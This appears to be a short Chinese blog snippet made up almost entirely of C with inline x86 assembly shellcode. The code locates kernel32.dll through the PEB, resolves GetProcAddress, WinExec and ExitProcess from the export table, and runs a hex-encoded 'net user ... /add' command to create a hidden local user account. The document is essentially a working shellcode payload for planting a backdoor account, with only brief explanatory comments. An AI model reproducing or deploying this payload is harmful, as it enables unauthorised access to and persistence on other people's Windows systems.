#include <windows.h>
int main()
{
__asm{
push ebp
sub esp, 0x40;
mov ebp, esp;
push ebp
mov eax, fs:0x30 ;PEB
mov eax, [eax+0x0c] ;Ldr
mov esi, [eax+0x1c] ;Flink
lodsd
mov edi, [eax+0x08] ;edi = kernel32.dll
mov eax, [edi+3Ch] ;eax = PE首部
mov edx, [edi+eax+78h]
add edx, edi ;edx = 输出表地址
mov ecx, [edx+18h] ;ecx = 输出函数个数
mov ebx, [edx+20h]
add ebx, edi ;ebx = 函数名地址
search:
dec ecx
mov esi, [ebx+ecx*4]
add esi, edi ;依次找每个函数名称
;GetProcAddress
mov eax, 0x50746547
cmp [esi], eax ;'PteG'
jne search
mov eax, 0x41636f72
cmp [esi+4], eax ;'Acor'
jne search
;如果是GetProcA,表示找到了
mov ebx, [edx+24h]
add ebx, edi ;ebx = 索引号地址
mov cx, [ebx+ecx*2] ;ecx = 计算出的索引号值
mov ebx, [edx+1Ch]
add ebx, edi ;ebx = 函数地址的起始位置
mov eax, [ebx+ecx*4]
add eax, edi ;用索引值,算GetProcAddress
mov [ebp+40h], eax ;GetProcAddress的地址=ebp+40
push dword ptr 0x00636578 ;//构造WinExec
push dword ptr 0x456e6957
push esp
push edi
call [ebp+40h] ;//执行GetProcAddress
mov [ebp+8h], eax ;//存入WinExec的地址 到[ebp+8h]
push dword ptr 0x00000070 ;//构造Sleep
push dword ptr 0x65656C53 ;
push esp
push edi
call [ebp+40h] ;//执行GetProcAddress
mov [ebp+12h], eax ;//存入Sleep的地址 到[ebp+12h]
push dword ptr 0x00737365 ;//构造ExitProcess
push dword ptr 0x636f7250
push dword ptr 0x74697845
push esp
push edi
call [ebp+40h] ;//执行GetProcAddress
mov [ebp+16h], eax ;//存入ExitProcess的地址
push 0
push dword ptr 0x00646461 ;add
push dword ptr 0x2F20776F ;ow /
push dword ptr 0x6E736E69 ;insn
push dword ptr 0x786E696C ;linx
push dword ptr 0x20776F6E ;now
push dword ptr 0x736E6978 ;xins
push dword ptr 0x6E696C20 ; lin
push dword ptr 0x72657375 ;user
push dword ptr 0x2074656E ;net
push esp
Call [ebp+8h]
push 0 ;ExitProcess
call [ebp+16h] ;//最后要调用一次exitprocess,直接exit,防止异常
}
return 0;
}
添加用户代码
最新推荐文章于 2022-02-23 15:02:25 发布